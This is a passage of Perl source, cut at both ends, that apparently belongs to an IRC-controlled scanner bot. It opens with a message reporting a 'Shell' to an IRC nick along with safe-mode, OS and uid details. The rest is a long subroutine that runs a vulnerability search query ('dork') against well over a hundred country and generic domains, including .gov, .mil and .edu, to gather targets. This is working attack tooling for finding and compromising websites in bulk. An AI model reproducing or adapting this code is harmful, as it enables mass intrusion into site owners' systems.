$uid "); &msg("$nick","2![9$engine2]!8,1 Shell 9 ".$addblockup5." 11(SafeMode=$safe) (OS=$os) $uid ");}} }exit;} } } } } ######################################### Searching site... sub search_engine() { my (@total,@clean); my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $logo = $_[4]; if ($engine eq "UAE") { my @uae = &jackx1($dork."+site:ae"); push(@total,@uae); } if ($engine eq "Myanmar") { my @myanmar = &jackx2($dork."+site:mm"); push(@total,@myanmar); } if ($engine eq "Argentina") { my @argentina = &jackx3($dork."+site:ar"); push(@total,@argentina); } if ($engine eq "Austria") { my @austria = &jackx4($dork."+site:at"); push(@total,@austria); } if ($engine eq "Australia") { my @australia = &jackx5($dork."+site:au"); push(@total,@australia); } if ($engine eq "Brazil") { my @brazil = &jackx6($dork."+site:br"); push(@total,@brazil); } if ($engine eq "Canada") { my @canada = &jackx7($dork."+site:ca"); push(@total,@canada); } if ($engine eq "Chili") { my @chili = &jackx8($dork."+site:cl"); push(@total,@chili); } if ($engine eq "Cina") { my @cina = &jackx9($dork."+site:cn"); push(@total,@cina); } if ($engine eq "CoMersil") { my @comersil = &jackx10($dork."+site:com"); push(@total,@comersil); } if ($engine eq "Czech") { my @czech = &jackx1($dork."+site:cz"); push(@total,@czech); } if ($engine eq "Germany") { my @germany = &jackx2($dork."+site:de"); push(@total,@germany); } if ($engine eq "Denmark") { my @denmark = &jackx3($dork."+site:dk"); push(@total,@denmark); } if ($engine eq "Spain") { my @spain = &jackx4($dork."+site:es"); push(@total,@spain); } if ($engine eq "Europe") { my @europe = &jackx5($dork."+site:eu"); push(@total,@europe); } if ($engine eq "France") { my @france = &jackx6($dork."+site:fr"); push(@total,@france); } if ($engine eq "Hungary") { my @hungary = &jackx7($dork."+site:hu"); push(@total,@hungary); } if ($engine eq "Indonesia") { my @indonesia = &jackx8($dork."+site:id"); push(@total,@indonesia); } if ($engine eq "Israel") { my @israel = &jackx9($dork."+site:il"); push(@total,@israel); } if ($engine eq "India") { my @india = &jackx10($dork."+site:in"); push(@total,@india); } if ($engine eq "Info") { my @info = &jackx1($dork."+site:info"); push(@total,@info); } if ($engine eq "Iran") { my @iran = &jackx2($dork."+site:ir"); push(@total,@iran); } if ($engine eq "Italy") { my @italy = &jackx3($dork."+site:it"); push(@total,@italy); } if ($engine eq "Japan") { my @japan = &jackx4($dork."+site:jp"); push(@total,@japan); } if ($engine eq "Korea") { my @korea = &jackx5($dork."+site:kr"); push(@total,@korea); } if ($engine eq "Mexico") { my @mexico = &jackx6($dork."+site:mx"); push(@total,@mexico); } if ($engine eq "Malaysia") { my @malaysia = &jackx7($dork."+site:my"); push(@total,@malaysia); } if ($engine eq "Network") { my @network = &jackx8($dork."+site:net"); push(@total,@network); } if ($engine eq "Netherlands") { my @netherlands = &jackx9($dork."+site:nl"); push(@total,@netherlands); } if ($engine eq "Organization") { my @organization = &jackx10($dork."+site:org"); push(@total,@organization); } if ($engine eq "Philippines") { my @philippines = &jackx1($dork."+site:ph"); push(@total,@philippines); } if ($engine eq "Poland") { my @poland = &jackx2($dork."+site:pl"); push(@total,@poland); } if ($engine eq "Romania") { my @romania = &jackx3($dork."+site:ro"); push(@total,@romania); } if ($engine eq "Russian") { my @russian = &jackx4($dork."+site:ru"); push(@total,@russian); } if ($engine eq "Thailand") { my @thailand = &jackx4($dork."+site:th"); push(@total,@thailand); } if ($engine eq "Ukraine") { my @ukraine = &jackx6($dork."+site:ua"); push(@total,@ukraine); } if ($engine eq "England") { my @england = &jackx7($dork."+site:uk"); push(@total,@england); } if ($engine eq "USA") { my @usa = &jackx8($dork."+site:us"); push(@total,@usa); } if ($engine eq "Slovenia") { my @slovenia = &jackx9($dork."+site:si"); push(@total,@slovenia); } if ($engine eq "Belgium") { my @belgium = &jackx10($dork."+site:be"); push(@total,@belgium); } if ($engine eq "Bussines") { my @bussines = &jackx1($dork."+site:biz"); push(@total,@bussines); } if ($engine eq "SouthAfrica") { my @southafrica = &jackx2($dork."+site:za"); push(@total,@southafrica); } if ($engine eq "Vietnam") { my @vietnam = &jackx3($dork."+site:vn"); push(@total,@vietnam); } if ($engine eq "Tuvalu") { my @tuvalu = &jackx4($dork."+site:tv"); push(@total,@tuvalu); } if ($engine eq "Cocos") { my @cocos = &jackx5($dork."+site:cc"); push(@total,@cocos); } if ($engine eq "Turky") { my @turky = &jackx6($dork."+site:tr"); push(@total,@turky); } if ($engine eq "Asia") { my @asia = &jackx7($dork."+site:asia"); push(@total,@asia); } if ($engine eq "Serbia") { my @serbia = &jackx8($dork."+site:rs"); push(@total,@serbia); } if ($engine eq "Singapore") { my @singapore = &jackx9($dork."+site:sg"); push(@total,@singapore); } if ($engine eq "Taiwan") { my @taiwan = &jackx10($dork."+site:tw"); push(@total,@taiwan); } if ($engine eq "Sweden") { my @sweden = &jackx1($dork."+site:se"); push(@total,@sweden); } if ($engine eq "Pakistan") { my @pakistan = &jackx2($dork."+site:pk"); push(@total,@pakistan); } if ($engine eq "Norway") { my @normay = &jackx3($dork."+site:no"); push(@total,@norway); } if ($engine eq "Montenegro") { my @montenegro = &jackx4($dork."+site:me"); push(@total,@montenegro); } if ($engine eq "Greece") { my @greece = &jackx5($dork."+site:gr"); push(@total,@greece); } if ($engine eq "Education") { my @education = &jackx6($dork."+site:edu"); push(@total,@education); } if ($engine eq "Goverment") { my @goverment = &jackx7($dork."+site:gov"); push(@total,@goverment); } if ($engine eq "Kazakhstan") { my @kazakhstan = &jackx8($dork."+site:kz"); push(@total,@kazakhstan); } if ($engine eq "Afganistan") { my @afganistan = &jackx9($dork."+site:af"); push(@total,@afganistan); } if ($engine eq "Albania") { my @albania = &jackx10($dork."+site:al"); push(@total,@albania); } if ($engine eq "Algeria") { my @algeria = &jackx1($dork."+site:dz"); push(@total,@algeria); } if ($engine eq "Angola") { my @angola = &jackx2($dork."+site:ao"); push(@total,@angola); } if ($engine eq "Armenia") { my @armenia = &jackx3($dork."+site:am"); push(@total,@armenia); } if ($engine eq "Azerbaijan") { my @azerbaijan = &jackx4($dork."+site:az"); push(@total,@azerbaijan); } if ($engine eq "Bahrain") { my @bahrain = &jackx5($dork."+site:bh"); push(@total,@bahrain); } if ($engine eq "Bangladesh") { my @bangladesh = &jackx6($dork."+site:bd"); push(@total,@bangladesh); } if ($engine eq "Belarus") { my @belarus = &jackx7($dork."+site:by"); push(@total,@belarus); } if ($engine eq "Bhutan") { my @bhutan = &jackx8($dork."+site:bt"); push(@total,@bhutan); } if ($engine eq "Bolivia") { my @bolivia = &jackx9($dork."+site:bo"); push(@total,@bolivia); } if ($engine eq "Bosnia") { my @bosnia = &jackx10($dork."+site:ba"); push(@total,@bosnia); } if ($engine eq "Bulgaria") { my @bulgaria = &jackx2($dork."+site:bg"); push(@total,@bulgaria); } if ($engine eq "Brunei") { my @brunei = &jackx3($dork."+site:bn"); push(@total,@brunei); } if ($engine eq "Cambodia") { my @cambodia = &jackx4($dork."+site:kh"); push(@total,@cambodia); } if ($engine eq "Cameroon") { my @cameroon = &jackx1($dork."+site:cm"); push(@total,@cameroon); } if ($engine eq "Christmas") { my @christmas = &jackx5($dork."+site:cx"); push(@total,@christmas); } if ($engine eq "CostaRika") { my @costarika = &jackx6($dork."+site:cr"); push(@total,@costarika); } if ($engine eq "Croatia") { my @croatia = &jackx7($dork."+site:hr"); push(@total,@croatia); } if ($engine eq "Cuba") { my @cuba = &jackx8($dork."+site:cu"); push(@total,@cuba); } if ($engine eq "Cyprus") { my @cyprus = &jackx9($dork."+site:cy"); push(@total,@cyprus); } if ($engine eq "Dominican") { my @dominican = &jackx10($dork."+site:dm"); push(@total,@dominican); } if ($engine eq "Equador") { my @equador = &jackx1($dork."+site:ec"); push(@total,@equador); } if ($engine eq "Egypt") { my @egypt = &jackx2($dork."+site:eg"); push(@total,@egypt); } if ($engine eq "Estonia") { my @estonia = &jackx3($dork."+site:ee"); push(@total,@estonia); } if ($engine eq "Finland") { my @finland = &jackx4($dork."+site:fi"); push(@total,@finland); } if ($engine eq "Georgia") { my @georgia = &jackx5($dork."+site:ge"); push(@total,@georgia); } if ($engine eq "Ghana") { my @ghana = &jackx6($dork."+site:gh"); push(@total,@ghana); } if ($engine eq "Grenada") { my @grenada = &jackx7($dork."+site:gd"); push(@total,@grenada); } if ($engine eq "Honduras") { my @honduras = &jackx8($dork."+site:hn"); push(@total,@honduras); } if ($engine eq "Hongkong") { my @hongkong = &jackx9($dork."+site:hk"); push(@total,@hongkong); } if ($engine eq "Iceland") { my @iceland = &jackx10($dork."+site:is"); push(@total,@iceland); } if ($engine eq "Ireland") { my @ireland = &jackx2($dork."+site:ie"); push(@total,@ireland); } if ($engine eq "Kenya") { my @kenya = &jackx3($dork."+site:ke"); push(@total,@kenya); } if ($engine eq "Kuwait") { my @kuwait = &jackx4($dork."+site:kw"); push(@total,@kuwait); } if ($engine eq "Laos") { my @laos = &jackx6($dork."+site:la"); push(@total,@laos); } if ($engine eq "Latvia") { my @latvia = &jackx7($dork."+site:lv"); push(@total,@latvia); } if ($engine eq "Liberia") { my @liberia = &jackx8($dork."+site:lr"); push(@total,@liberia); } if ($engine eq "Libyan") { my @libyan = &jackx9($dork."+site:ly"); push(@total,@libyan); } if ($engine eq "Lithuania") { my @lithuania = &jackx1($dork."+site:lt"); push(@total,@lithuania); } if ($engine eq "Macedonia") { my @macedonia = &jackx5($dork."+site:mk"); push(@total,@macedonia); } if ($engine eq "Malta") { my @malta = &jackx1($dork."+site:mt"); push(@total,@malta); } if ($engine eq "Mongolia") { my @mongolia = &jackx2($dork."+site:mn"); push(@total,@mongolia); } if ($engine eq "Mozambique") { my @mozambique = &jackx3($dork."+site:mz"); push(@total,@mozambique); } if ($engine eq "Namibia") { my @namibia = &jackx4($dork."+site:na"); push(@total,@namibia); } if ($engine eq "Nauru") { my @nauru = &jackx6($dork."+site:nr"); push(@total,@nauru); } if ($engine eq "Nepal") { my @nepal = &jackx7($dork."+site:np"); push(@total,@nepal); } if ($engine eq "NewZealand") { my @newzealand = &jackx8($dork."+site:nz"); push(@total,@newzealand); } if ($engine eq "Nigeria") { my @nigeria = &jackx9($dork."+site:ng"); push(@total,@nigeria); } if ($engine eq "Paraguay") { my @paraguay = &jackx10($dork."+site:py"); push(@total,@paraguay); } if ($engine eq "Peru") { my @peru = &jackx5($dork."+site:pe"); push(@total,@peru); } if ($engine eq "Portugal") { my @portugal = &jackx1($dork."+site:pt"); push(@total,@portugal); } if ($engine eq "PuertoRico") { my @puertorico = &jackx2($dork."+site:pr"); push(@total,@puertorico); } if ($engine eq "Qatar") { my @qatar = &jackx3($dork."+site:qa"); push(@total,@qatar); } if ($engine eq "SaintLucia") { my @saintlucia = &jackx4($dork."+site:lc"); push(@total,@saintlucia); } if ($engine eq "Samoa") { my @samoa = &jackx5($dork."+site:ws"); push(@total,@samoa); } if ($engine eq "SaudiArabia") { my @saudiarabia = &jackx7($dork."+site:sa"); push(@total,@saudiarabia); } if ($engine eq "Senegal") { my @senegal = &jackx8($dork."+site:sn"); push(@total,@senegal); } if ($engine eq "Slovakia") { my @slovakia = &jackx6($dork."+site:sk"); push(@total,@slovakia); } if ($engine eq "Srilanka") { my @srilanka = &jackx9($dork."+site:lk"); push(@total,@srilanka); } if ($engine eq "Swaziland") { my @swaziland = &jackx10($dork."+site:sz"); push(@total,@swaziland); } if ($engine eq "Tajikistan") { my @tajikistan = &jackx1($dork."+site:tj"); push(@total,@tajikistan); } if ($engine eq "Tanzania") { my @tanzania = &jackx2($dork."+site:tz"); push(@total,@tanzania); } if ($engine eq "Tokelau") { my @tokelau = &jackx3($dork."+site:tk"); push(@total,@tokelau); } if ($engine eq "Tonga") { my @tonga = &jackx4($dork."+site:to"); push(@total,@tonga); } if ($engine eq "Tunisia") { my @tunisia = &jackx5($dork."+site:tn"); push(@total,@tunisia); } if ($engine eq "Uruguay") { my @uruguay = &jackx6($dork."+site:uy"); push(@total,@uruguay); } if ($engine eq "Uzbekistan") { my @uzbekistan = &jackx7($dork."+site:uz"); push(@total,@uzbekistan); } if ($engine eq "Venezuela") { my @venezuela = &jackx8($dork."+site:ve"); push(@total,@venezuela); } if ($engine eq "Yemen") { my @yemen = &jackx9($dork."+site:ye"); push(@total,@yemen); } if ($engine eq "Yugoslavia") { my @yugoslavia = &jackx10($dork."+site:yu"); push(@total,@yugoslavia); } if ($engine eq "Zambia") { my @zambia = &jackx1($dork."+site:zm"); push(@total,@zambia); } if ($engine eq "Uganda") { my @uganda = &jackx2($dork."+site:ug"); push(@total,@uganda); } if ($engine eq "Trinidad") { my @trinidad = &jackx3($dork."+site:tt"); push(@total,@trinidad); } if ($engine eq "Zimbabwe") { my @zimbabwe = &jackx4($dork."+site:zw"); push(@total,@zimbabwe); } if ($engine eq "JacKAE") { my @jackae = &jack1($dork."+site:ae"); push(@total,@jackae); } if ($engine eq "JacKAR") { my @jackar = &jack2($dork."+site:ar"); push(@total,@jackar); } if ($engine eq "JacKAT") { my @jackat = &jack3($dork."+site:at"); push(@total,@jackat); } if ($engine eq "JacKAU") { my @jackau = &jack4($dork."+site:au"); push(@total,@jackau); } if ($engine eq "JacKBR") { my @jackbr = &jack5($dork."+site:br"); push(@total,@jackbr); } if ($engine eq "JacKCA") { my @jackca = &jack6($dork."+site:ca"); push(@total,@jackca); } if ($engine eq "JacKCL") { my @jackcl = &jack7($dork."+site:cl"); push(@total,@jackcl); } if ($engine eq "JacKCN") { my @jackcn = &jack8($dork."+site:cn"); push(@total,@jackcn); } if ($engine eq "JacKCoM") { my @jackcom = &jack9($dork."+site:com"); push(@total,@jackcom); } if ($engine eq "JacKCZ") { my @jackcz = &jack10($dork."+site:cz"); push(@total,@jackcz); } if ($engine eq "JacKDE") { my @jackde = &jack1($dork."+site:de"); push(@total,@jackde); } if ($engine eq "JacKDK") { my @jackdk = &jack2($dork."+site:dk"); push(@total,@jackdk); } if ($engine eq "JacKES") { my @jackes = &jack3($dork."+site:es"); push(@total,@jackes); } if ($engine eq "JacKEU") { my @jackeu = &jack4($dork."+site:eu"); push(@total,@jackeu); } if ($engine eq "JacKFR") { my @jackfr = &jack5($dork."+site:fr"); push(@total,@jackfr); } if ($engine eq "JacKHU") { my @jackhu = &jack6($dork."+site:hu"); push(@total,@jackhu); } if ($engine eq "JacKID") { my @jackid = &jack7($dork."+site:id"); push(@total,@jackid); } if ($engine eq "JacKIL") { my @jackil = &jack8($dork."+site:il"); push(@total,@jackil); } if ($engine eq "JacKIN") { my @jackin = &jack9($dork."+site:in"); push(@total,@jackin); } if ($engine eq "JacKInfO") { my @jackinfo = &jack10($dork."+site:info"); push(@total,@jackinfo); } if ($engine eq "JacKIR") { my @jackir = &jack1($dork."+site:ir"); push(@total,@jackir); } if ($engine eq "JacKIT") { my @jackit = &jack2($dork."+site:it"); push(@total,@jackit); } if ($engine eq "JacKJP") { my @jackjp = &jack3($dork."+site:jp"); push(@total,@jackjp); } if ($engine eq "JacKKR") { my @jackkr = &jack4($dork."+site:kr"); push(@total,@jackkr); } if ($engine eq "JacKMX") { my @jackmx = &jack5($dork."+site:mx"); push(@total,@jackmx); } if ($engine eq "JacKMY") { my @jackmy = &jack6($dork."+site:my"); push(@total,@jackmy); } if ($engine eq "JacKNeT") { my @jacknet = &jack7($dork."+site:net"); push(@total,@jacknet); } if ($engine eq "JacKNL") { my @jacknl = &jack8($dork."+site:nl"); push(@total,@jacknl); } if ($engine eq "JacKOrG") { my @jackorg = &jack9($dork."+site:org"); push(@total,@jackorg); } if ($engine eq "JacKPH") { my @jackph = &jack10($dork."+site:ph"); push(@total,@jackph); } if ($engine eq "JacKPL") { my @jackpl = &jack1($dork."+site:pl"); push(@total,@jackpl); } if ($engine eq "JacKRO") { my @jackro = &jack2($dork."+site:ro"); push(@total,@jackro); } if ($engine eq "JacKRU") { my @jackru = &jack3($dork."+site:ru"); push(@total,@jackru); } if ($engine eq "JacKTH") { my @jackth = &jack4($dork."+site:th"); push(@total,@jackth); } if ($engine eq "JacKUA") { my @jackua = &jack5($dork."+site:ua"); push(@total,@jackua); } if ($engine eq "JacKUK") { my @jackuk = &jack6($dork."+site:uk"); push(@total,@jackuk); } if ($engine eq "JacKUS") { my @jackus = &jack7($dork."+site:us"); push(@total,@jackus); } if ($engine eq "JacKSI") { my @jacksi = &jack8($dork."+site:si"); push(@total,@jacksi); } if ($engine eq "JacKBE") { my @jackbe = &jack9($dork."+site:be"); push(@total,@jackbe); } if ($engine eq "JacKBIZ") { my @jackbiz = &jack10($dork."+site:biz"); push(@total,@jackbiz); } if ($engine eq "JacKXXX") { my @jackxxx = &jack1($dork."+site:xxx"); push(@total,@jackxxx); } if ($engine eq "JacKTEL") { my @jacktel = &jack2($dork."+site:tel"); push(@total,@jacktel); } if ($engine eq "JacKTV") { my @jacktv = &jack3($dork."+site:tv"); push(@total,@jacktv); } if ($engine eq "JacKCC") { my @jackcc = &jack4($dork."+site:cc"); push(@total,@jackcc); } if ($engine eq "JacKMIL") { my @jackmil = &jack5($dork."+site:mil"); push(@total,@jackmil); } if ($engine eq "JacKASIA") { my @jackasia = &jack6($dork."+site:asia"); push(@total,@jackasia); } if ($engine eq "JacKNAME") { my @jackname = &jack7($dork."+site:name"); push(@total,@jackname); } if ($engine eq "JacKPRO") { my @jackpro = &jack8($dork."+site:pro"); push(@total,@jackpro); } if ($engine eq "JacKTRAVEL") { my @jacktravel = &jack9($dork."+site:travel"); push(@total,@jacktravel); } if ($engine eq "JacKJOBS") { my @jackjobs = &jack10($dork."+site:jobs"); push(@total,@jackjobs); } if ($engine eq "JacKMOBI") { my @jackmobi = &jack1($dork."+site:mobi"); push(@total,@jackmobi); } if ($engine eq "JacKAERO") { my @jackaero = &jack2($dork."+site:aero"); push(@total,@jackaero); } if ($engine eq "JacKCAT") { my @jackcat = &jack3($dork."+site:cat"); push(@total,@jackcat); } if ($engine eq "JacKCOOP") { my @jackcoop = &jack4($dork."+site:coop"); push(@total,@jackcoop); } if ($engine eq "JacKEDU") { my @jackedu = &jack5($dork."+site:edu"); push(@total,@jackedu); } if ($engine eq "JacKGOV") { my @jackgov = &jack6($dork."+site:gov"); push(@total,@jackgov); } if ($engine eq "JacKAS") { my @jackas = &jack7($dork."+site:as"); push(@total,@jackas); } if ($engine eq "JacKAI") { my @jackai = &jack8($dork."+site:ai"); push(@total,@jackai); } if ($engine eq "JacKAG") { my @jackag = &jack9($dork."+site:ag"); push(@total,@jackag); } if ($engine eq "JacKAZ") { my @jackaz = &jack10($dork."+site:az"); push(@total,@jackaz); } if ($engine eq "JacKBH") { my @jackbh = &jack3($dork."+site:bh"); push(@total,@jackbh); } if ($engine eq "JacKBD") { my @jackbd = &jack4($dork."+site:bd"); push(@total,@jackbd); } if ($engine eq "JacKBZ") { my @jackbz = &jack5($dork."+site:bz"); push(@total,@jackbz); } if ($engine eq "JacKBO") { my @jackbo = &jack6($dork."+site:bo"); push(@total,@jackbo); } if ($engine eq "JacKBA") { my @jackba = &jack7($dork."+site:ba"); push(@total,@jackba); } if ($engine eq "JacKBW") { my @jackbw = &jack8($dork."+site:bw"); push(@total,@jackbw); } if ($engine eq "JacKVG") { my @jackvg = &jack9($dork."+site:vg"); push(@total,@jackvg); } if ($engine eq "JacKBG") { my @jackbg = &jack10($dork."+site:bg"); push(@total,@jackbg); } if ($engine eq "JacKBI") { my @jackbi = &jack1($dork."+site:bi"); push(@total,@jackbi); } if ($engine eq "JacKCO") { my @jackco = &jack2($dork."+site:co"); push(@total,@jackco); } if ($engine eq "JacKCD") { my @jackcd = &jack3($dork."+site:cd"); push(@total,@jackcd); } if ($engine eq "JacKCG") { my @jackcg = &jack4($dork."+site:cg"); push(@total,@jackcg); } if ($engine eq "JacKCK") { my @jackck = &jack5($dork."+site:ck"); push(@total,@jackck); } if ($engine eq "JacKCR") { my @jackcr = &jack6($dork."+site:cr"); push(@total,@jackcr); } if ($engine eq "JacKHR") { my @jackhr = &jack7($dork."+site:hr"); push(@total,@jackhr); } if ($engine eq "JacKCU") { my @jackcu = &jack8($dork."+site:cu"); push(@total,@jackcu); } if ($engine eq "JacKCI") { my @jackci = &jack9($dork."+site:ci"); push(@total,@jackci); } if ($engine eq "JacKDJ") { my @jackdj = &jack10($dork."+site:dj"); push(@total,@jackdj); } if ($engine eq "JacKDM") { my @jackdm = &jack1($dork."+site:dm"); push(@total,@jackdm); } if ($engine eq "JacKDO") { my @jackdo = &jack2($dork."+site:do"); push(@total,@jackdo); } if ($engine eq "JacKEC") { my @jackec = &jack3($dork."+site:ec"); push(@total,@jackec); } if ($engine eq "JacKEG") { my @jackeg = &jack4($dork."+site:eg"); push(@total,@jackeg); } if ($engine eq "JacKSV") { my @jacksv = &jack5($dork."+site:sv"); push(@total,@jacksv); } if ($engine eq "JacKEE") { my @jackee = &jack6($dork."+site:ee"); push(@total,@jackee); } if ($engine eq "JacKET") { my @jacket = &jack7($dork."+site:et"); push(@total,@jacket); } if ($engine eq "JacKFJ") { my @jackfj = &jack8($dork."+site:fj"); push(@total,@jackfj); } if ($engine eq "JacKFI") { my @jackfi = &jack9($dork."+site:fi"); push(@total,@jackfi); } if ($engine eq "JacKGM") { my @jackgm = &jack10($dork."+site:gm"); push(@total,@jackgm); } if ($engine eq "JacKGI") { my @jackgi = &jack1($dork."+site:gi"); push(@total,@jackgi); } if ($engine eq "JacKGR") { my @jackgr = &jack2($dork."+site:gr"); push(@total,@jackgr); } if ($engine eq "JacKGL") { my @jackgl = &jack3($dork."+site:gl"); push(@total,@jackgl); } if ($engine eq "JacKGT") { my @jackgt = &jack4($dork."+site:gt"); push(@total,@jackgt); } if ($engine eq "JacKGG") { my @jackgg = &jack5($dork."+site:gg"); push(@total,@jackgg); } if ($engine eq "JacKHT") { my @jackht = &jack6($dork."+site:ht"); push(@total,@jackht); } if ($engine eq "JacKHN") { my @jackhn = &jack7($dork."+site:hn"); push(@total,@jackhn); } if ($engine eq "JacKHK") { my @jackhk = &jack8($dork."+site:hk"); push(@total,@jackhk); } if ($engine eq "JacKIS") { my @jackis = &jack9($dork."+site:is"); push(@total,@jackis); } if ($engine eq "JacKIE") { my @jackie = &jack10($dork."+site:ie"); push(@total,@jackie); } if ($engine eq "JacKIM") { my @jackim = &jack1($dork."+site:im"); push(@total,@jackim); } if ($engine eq "JacKJE") { my @jackje = &jack2($dork."+site:je"); push(@total,@jackje); } if ($engine eq "JacKJO") { my @jackjo = &jack3($dork."+site:jo"); push(@total,@jackjo); } if ($engine eq "JacKKZ") { my @jackkz = &jack4($dork."+site:kz"); push(@total,@jackkz); } if ($engine eq "JacKKE") { my @jackke = &jack5($dork."+site:ke"); push(@total,@jackke); } if ($engine eq "JacKKG") { my @jackkg = &jack6($dork."+site:kg"); push(@total,@jackkg); } if ($engine eq "JacKLV") { my @jacklv = &jack7($dork."+site:lv"); push(@total,@jacklv); } if ($engine eq "JacKLS") { my @jackls = &jack8($dork."+site:ls"); push(@total,@jackls); } if ($engine eq "JacKLY") { my @jackly = &jack9($dork."+site:ly"); push(@total,@jackly); } if ($engine eq "JacKLI") { my @jackli = &jack10($dork."+site:li"); push(@total,@jackli); } if ($engine eq "JacKLT") { my @jacklt = &jack1($dork."+site:lt"); push(@total,@jacklt); } if ($engine eq "JacKLU") { my @jacklu = &jack2($dork."+site:lu"); push(@total,@jacklu); } if ($engine eq "JacKMW") { my @jackmw = &jack3($dork."+site:mw"); push(@total,@jackmw); } if ($engine eq "JacKMT") { my @jackmt = &jack4($dork."+site:mt"); push(@total,@jackmt); } if ($engine eq "JacKMU") { my @jackmu = &jack5($dork."+site:mu"); push(@total,@jackmu); } if ($engine eq "JacKFM") { my @jackfm = &jack6($dork."+site:fm"); push(@total,@jackfm); } if ($engine eq "JacKMN") { my @jackmn = &jack7($dork."+site:mn"); push(@total,@jackmn); } if ($engine eq "JacKMS") { my @jackms = &jack8($dork."+site:ms"); push(@total,@jackms); } if ($engine eq "JacKMA") { my @jackma = &jack9($dork."+site:ma"); push(@total,@jackma); } if ($engine eq "JacKNA") { my @jackna = &jack10($dork."+site:na"); push(@total,@jackna); } if ($engine eq "JacKNP") { my @jacknp = &jack1($dork."+site:np"); push(@total,@jacknp); } if ($engine eq "JacKNZ") { my @jacknz = &jack2($dork."+site:nz"); push(@total,@jacknz); } if ($engine eq "JacKNI") { my @jackni = &jack3($dork."+site:ni"); push(@total,@jackni); } if ($engine eq "JacKNF") { my @jacknf = &jack4($dork."+site:nf"); push(@total,@jacknf); } if ($engine eq "JacKNO") { my @jackno = &jack5($dork."+site:no"); push(@total,@jackno); } if ($engine eq "JacKOM") { my @jackom = &jack6($dork."+site:om"); push(@total,@jackom); } if ($engine eq "JacKPK") { my @jackpk = &jack7($dork."+site:pk"); push(@total,@jackpk); } if ($engine eq "JacKPA") { my @jackpa = &jack8($dork."+site:pa"); push(@total,@jackpa); } if ($engine eq "JacKPY") { my @jackpy = &jack9($dork."+site:py"); push(@total,@jackpy); } if ($engine eq "JacKPE") { my @jackpe = &jack10($dork."+site:pe"); push(@total,@jackpe); } if ($engine eq "JacKPN") { my @jackpn = &jack1($dork."+site:pn"); push(@total,@jackpn); } if ($engine eq "JacKPT") { my @jackpt = &jack2($dork."+site:pt"); push(@total,@jackpt); } if ($engine eq "JacKPR") { my @jackpr = &jack3($dork."+site:pr"); push(@total,@jackpr); } if ($engine eq "JacKQA") { my @jackqa = &jack4($dork."+site:qa"); push(@total,@jackqa); } if ($engine eq "JacKRW") { my @jackrw = &jack5($dork."+site:rw"); push(@total,@jackrw); } if ($engine eq "JacKSH") { my @jacksh = &jack6($dork."+site:sh"); push(@total,@jacksh); } if ($engine eq "JacKSM") { my @jacksm = &jack7($dork."+site:sm"); push(@total,@jacksm); } if ($engine eq "JacKSA") { my @jacksa = &jack8($dork."+site:sa"); push(@total,@jacksa); } if ($engine eq "JacKSN") { my @jacksn = &jack9($dork."+site:sn"); push(@total,@jacksn); } if ($engine eq "JacKSC") { my @jacksc = &jack10($dork."+site:sc"); push(@total,@jacksc); } if ($engine eq "JacKSG") { my @jacksg = &jack1($dork."+site:sg"); push(@total,@jacksg); } if ($engine eq "JacKSK") { my @jacksk = &jack2($dork."+site:sk"); push(@total,@jacksk); } if ($engine eq "JacKZA") { my @jackza = &jack3($dork."+site:za"); push(@total,@jackza); } if ($engine eq "JacKLK") { my @jacklk = &jack4($dork."+site:lk"); push(@total,@jacklk); } if ($engine eq "JacKVC") { my @jackvc = &jack5($dork."+site:vc"); push(@total,@jackvc); } if ($engine eq "JacKSE") { my @jackse = &jack6($dork."+site:se"); push(@total,@jackse); } if ($engine eq "JacKCH") { my @jackch = &jack7($dork."+site:ch"); push(@total,@jackch); } if ($engine eq "JacKTW") { my @jacktw = &jack8($dork."+site:tw"); push(@total,@jacktw); } if ($engine eq "JacKTJ") { my @jacktj = &jack9($dork."+site:tj"); push(@total,@jacktj); } if ($engine eq "JacKBS") { my @jackbs = &jack10($dork."+site:bs"); push(@total,@jackbs); } if ($engine eq "JacKTO") { my @jackto = &jack1($dork."+site:to"); push(@total,@jackto); } if ($engine eq "JacKTT") { my @jacktt = &jack2($dork."+site:tt"); push(@total,@jacktt); } if ($engine eq "JacKTR") { my @jacktr = &jack3($dork."+site:tr"); push(@total,@jacktr); } if ($engine eq "JacKTM") { my @jacktm = &jack4($dork."+site:tm"); push(@total,@jacktm); } if ($engine eq "JacKVI") { my @jackvi = &jack5($dork."+site:vi"); push(@total,@jackvi); } if ($engine eq "JacKUG") { my @jackug = &jack6($dork."+site:ug"); push(@total,@jackug); } if ($engine eq "JacKUY") { my @jackuy = &jack7($dork."+site:uy"); push(@total,@jackuy); } if ($engine eq "JacKUZ") { my @jackuz = &jack8($dork."+site:uz"); push(@total,@jackuz); } if ($engine eq "JacKVE") { my @jackve = &jack9($dork."+site:ve"); push(@total,@jackve); } if ($engine eq "JacKVN") { my @jackvn = &jack10($dork."+site:vn"); push(@total,@jackvn); } if ($engine eq "JacKZM") { my @jackzm = &jack1($dork."+site:zm"); push(@total,@jackzm); } if ($engine eq "JacKMUSEUM") { my @jackmuseum = &jack2($dork."+site:museum"); push(@total,@jackmuseum); } if ($engine eq "googleUK") { my @googleuk = &googleuk($dork); push(@total,@googleuk); } if ($engine eq "googleBR") { my @googlebr = &googlebr($dork); push(@total,@googlebr); } if ($engine eq "googleRU") { my @googleru = &googleru($dork); push(@total,@googleru); } if ($engine eq "googleNET") { my @googlenet = &googlenet($dork); push(@total,@googlenet); } if ($engine eq "googleIT") { my @googleit = &googleit($dork); push(@total,@googleit); } if ($engine eq "googleCOM") { my @googlecom = &googlecom($dork); push(@total,@googlecom); } if ($engine eq "googleORG") { my @googleorg = &googleorg($dork); push(@total,@googleorg); } if ($engine eq "googleDE") { my @googlede = &googlede($dork); push(@total,@googlede); } if ($engine eq "googleFR") { my @googlefr = &googlefr($dork); push(@total,@googlefr); } if ($engine eq "googleCZ") { my @googlecz = &googlecz($dork); push(@total,@googlecz); } if ($engine eq "googleIR") { my @googleir = &googleir($dork); push(@total,@googleir); } if ($engine eq "googleME") { my @googleme = &googleme($dork); push(@total,@googleme); } if ($engine eq "googleTW") { my @googletw = &googletw($dork); push(@total,@googletw); } if ($engine eq "googleCL") { my @googlecl = &googlecl($dork); push(@total,@googlecl); } if ($engine eq "googleSE") { my @googlese = &googlese($dork); push(@total,@googlese); } if ($engine eq "googleCA") { my @googleca = &googleca($dork); push(@total,@googleca); } if ($engine eq "googleMX") { my @googlemx = &googlemx($dork); push(@total,@googlemx); } if ($engine eq "googleNL") { my @googlenl = &googlenl($dork); push(@total,@googlenl); } if ($engine eq "googleDK") { my @googledk = &googledk($dork); push(@total,@googledk); } if ($engine eq "googleUS") { my @googleus 